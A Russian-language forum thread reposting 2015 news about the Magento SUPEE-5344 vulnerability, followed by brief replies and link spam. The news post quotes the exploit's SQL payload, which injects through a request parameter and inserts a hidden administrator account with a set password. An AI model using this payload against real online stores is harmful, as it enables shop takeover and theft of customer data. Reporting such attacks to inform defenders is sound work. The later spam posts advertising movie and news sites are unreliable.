1. Приветствую гостей и пользователей нашего форума! Первый раз вы у нас или же давно участвуете в жизни ресурса, хочу напомнить несколько моментов.

    1) Пользуемся поиском по форуму! Зачастую информация может находиться не по разделу!

    2) Раздел ИНФО-продуктов относительно новый, но имеем уже более 3000 высококлассных материалов (пользуемся сортировкой по прификсам).

    3) И самое важное, КАК КАЧАТЬ БЕЗ ОГРАНИЧЕНИЙ, вся информация находится по этой ссылке КУПИТЬ VIP

    4) Временная акция, получи +5 постов за вступление в нашу группу "Вконтакте" Более подробно ТУТ

    5) Веди активную жизнь на форуме и получай рубли на личный счёт!

    Скрыть объявление
  2. На нашем форуме Null-Prog действует серьёзное правило касательно размещения материалов!

    ДЛЯ РЕЛИЗЁРОВ: категорически запрещается выкладка материалов на файлообменники типа Deposit, letitbit и другие, требующие просмотров рекламы, обрезающие скорость и тд. Нарушителям, первые 2 раза предупреждения, далее БАН. Тему по этому поводу можно посмотреть ТУТ

    Скрыть объявление
  3. В тестовом режиме на нашем форуме открыт онлайн конструктор сайтов. Вы можете попробовать создать свой сайт у НАС, интуитивно понятный интерфейс, переведёт на 95%, быстрый экспорт проекта, от вас только перетаскивать элементы и вставить в них необходимый текст!

    Все вопросы ТУТ

    Скрыть объявление

  4. Скрыть объявление
  5. Уважаемые форумчане, открывается новый раздел форума, посвящённый ремонту и эксплуатации автомобилей. Просмотреть его можно ТУТ

    Так как раздел новый, информация будет пополнять каждый день. Если есть какие либо замечания по этому разделу, отписываемся в соответствующий раздел форума, либо в личку.

    Напоминаю, сообщения в разделе АВТО не учитываются, общение не ограничено.

    Скрыть объявление
  6. Объявляется набор Модераторов на различные раздел форума, свои заявки можно оставлять в ЭТОМ разделе, перед оставлением заявки рекомендуется ознакомиться с ПРАВИЛАМИ для модераторов.

Важно Уязвимость в CMS Magento: пострадали 98 000 интернет-магазинов

Тема в разделе "Обсуждение новостей", создана пользователем Sam Jack, 7 май 2015.

  1. Sam Jack

    Sam Jack Капитан-Узурпатор
    Команда форума Созидатель

    Регистрация:
    5 май 2015
    Сообщения:
    13.726
    Симпатии:
    4.902
    [​IMG]
    Злоумышленники уже начали эксплуатировать исключительно опасную уязвимость SUPEE-5344, которая присутствует почти в 100 000 интернет-магазинах, работающих на системе управления контентом Magento.

    Magento считается самой популярной CMS для интернет-магазинов. Разработчики выпустили патчещё в феврале, но до сих пор большое количество торговых площадок не установили его, как это часто бывает. Многие владельцы магазинов просто не знают, что подвергают опасности и себя, и своих пользователей.

    О проблеме рассказал голландский хостер Byte, который размещает много сайтов на платформе Magento. Они уже наблюдали использование эксплоита для Magento версий Community и Enterprise.

    Информацию подтверждают коллеги из Sucuri. Они говорят, что обнаруженный ими эксплоит осуществляет только одну функцию: создаёт фальшивый админский аккаунт в базе данных Magento.

    popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);

    SET @SALT = “rp”;

    SET @PASS = CONCAT(MD5(CONCAT( @SALT , ‘123’) ), CONCAT(‘:’, @SALT ));
    SELECT @@EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;

    INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (‘Firstname’,’Lastname’,”email@example.com”,’ypwq‘,@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());

    INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,’U’,(SELECT user_id FROM admin_user WHERE username = ‘ypwq’),’Firstname’); –


    «Уязвимость на самом деле состоит из цепочки нескольких уязвимостей, которые в итоге позволяют неавторизованному пользователю запустить PHP-код на сервере», — объясняетНетанель Рубин (Netanel Rubin) из компании Check Point. В частности, используются уязвимости CVE-2015-1397, CVE-2015-1398 и CVE-2015-1399. На сопровождающем видео специалисты Check Point показывают, как заказать дорогие наручные часы, используя SUPEE-5344.

    По информации Incapsula, атаки начались в понедельник с IP-адресов 62.76.177.179 и 185.22.232.218 (оба российские).
     
    Метки:
  2. torrok

    torrok Новичок

    Регистрация:
    22 сен 2015
    Сообщения:
    17
    Симпатии:
    1
    Интересно уже исправили. слишком уж навороченный это Magento
     
  3. emosko

    emosko Новичок

    Регистрация:
    4 ноя 2015
    Сообщения:
    26
    Симпатии:
    4
    хорошо что я передумал ставить на него магаз. опенкарт рулит. хотя наверное весь в дырах
     
  4. Saike

    Saike Новичок

    Регистрация:
    13 дек 2018
    Сообщения:
    0
    Симпатии:
    0
    тупа пад сталом!!!!
     
  5. AnutaSaw

    AnutaSaw Новичок

    Регистрация:
    9 авг 2019
    Сообщения:
    1
    Симпатии:
    0
    так писали уже в соответствующей теме. хотя не факт что кто-то и тут не увидит и еще одну создаст. есть SMART БЕЗЛИМИТИЩЕ : интернет звонки на МТС всей России 12,90 рублей в сутки

    [​IMG]С уважением!
     
  6. Bradleyzex

    Bradleyzex Новичок

    Регистрация:
    10 май 2020
    Сообщения:
    0
    Симпатии:
    0
    Дополнительная гарантия это всего лишь развод на деньги. Связывался я с ней правдой в с связным. В итоге получилось, что основная гарантия кончилась доп. Осталась и телефон сломался. В итогеиего отправили в Новосибирск, потом снова в Братск и с ним пришёл ответ, что извините но в данный момент у нас нет на него запчастей так что отремонтировать мы его не можем. Когда пришёл в магазин обменивать его, продавцы заявили , что по дополнительной гарантий товар ни кто не обменивается. В итоге я остался с носом и с минусом в тысячу рублей.
     
  7. GregoryBeerb

    GregoryBeerb Новичок

    Регистрация:
    16 авг 2020
    Сообщения:
    7
    Симпатии:
    0
  8. GregoryBeerb

    GregoryBeerb Новичок

    Регистрация:
    16 авг 2020
    Сообщения:
    7
    Симпатии:
    0
  9. GregoryBeerb

    GregoryBeerb Новичок

    Регистрация:
    16 авг 2020
    Сообщения:
    7
    Симпатии:
    0
  10. GregoryBeerb

    GregoryBeerb Новичок

    Регистрация:
    16 авг 2020
    Сообщения:
    7
    Симпатии:
    0
  11. DavidMunda

    DavidMunda Новичок

    Регистрация:
    29 мар 2021
    Сообщения:
    0
    Симпатии:
    0
    Привет всем участникам форума! интересный у вас сайт!
    Нашел обширную базу кино: мультфильмы тачки маквин смотреть в хорошем качестве http://kinovalenok.tv/
    Здесь: лучшее фэнтези 2020 смотреть онлайн http://kinovalenok.tv/fentezi/ рейтинг 2021
    Здесь: фильм хорошего качества бесплатно военный военные фильмы онлайн бесплатно в хорошем качестве список 2020
    Тут: Кот в шляпе / The Cat in the Hat (Сезон 1) (2003-2011) смотреть онлайн бесплатно http://kinovalenok.tv/8031-kot-v-shlyape-the-cat-in-the-hat-sezon-1-2003-2011.html
    Тут: http://kinovalenok.tv/6181-merlin-merlin-sezon-1-5-2008-2012.html
     
  12. DavidMunda

    DavidMunda Новичок

    Регистрация:
    29 мар 2021
    Сообщения:
    0
    Симпатии:
    0
    Приветствую всех! прикольный у вас сайт!
    Нашел класную базу кино: лучшие сериалы игра престолов смотреть
    Здесь: аниме на русском смотреть в хорошем качестве http://kinovalenok.tv/anime/ рейтинг 2021
    Здесь: аниме через торрент бесплатно в хорошем качестве смотреть мультфильмы аниме в хорошем качестве рейтинг 2020
    Тут: Лондонские поля / London Fields (2018) смотреть онлайн бесплатно http://kinovalenok.tv/14962-londonskie-polya-london-fields-2018.html
    Здесь: Чудо (2009) смотреть онлайн бесплатно Чудо (2009) смотреть онлайн бесплатно
     
  13. torrent

    torrent Новичок

    Регистрация:
    1 июн 2021
    Сообщения:
    1
    Симпатии:
    0
    Это важно
     
  14. AntwanTop

    AntwanTop Новичок

    Регистрация:
    15 май 2021
    Сообщения:
    0
    Симпатии:
    0
  15. Josephawalf

    Josephawalf Новичок

    Регистрация:
    18 май 2021
    Сообщения:
    1
    Симпатии:
    0
    Привет всем! Класный у вас сайт!
    Что думаете по этим новостям?:
    С начала года МОЭСК заключила более 3000 договоров техприсоединения с потребителями южного Подмосковья http://energynews.su/5625-s-nachala...ya-s-potrebitelyami-yuzhnogo-podmoskovya.html
    http://energynews.su/12945-obse-v-kolomye-rastet-kolichestvo-nezakonnogo-oruzhiya-iz-zony-ato.html
    новости экономики на сегодняшний день новости в экономике
    Ещё много интересного нашел тут: новости энергетики статьи http://energynews.su/
     
  16. jonsirhync

    jonsirhync Пользователь

    Регистрация:
    2 сен 2021
    Сообщения:
    389
    Симпатии:
    0

Поделиться этой страницей

iHax Community
Рейтинг@Mail.ru Яндекс.Метрика мониторинг сайтов
Форум программного обеспечения/
Загрузка...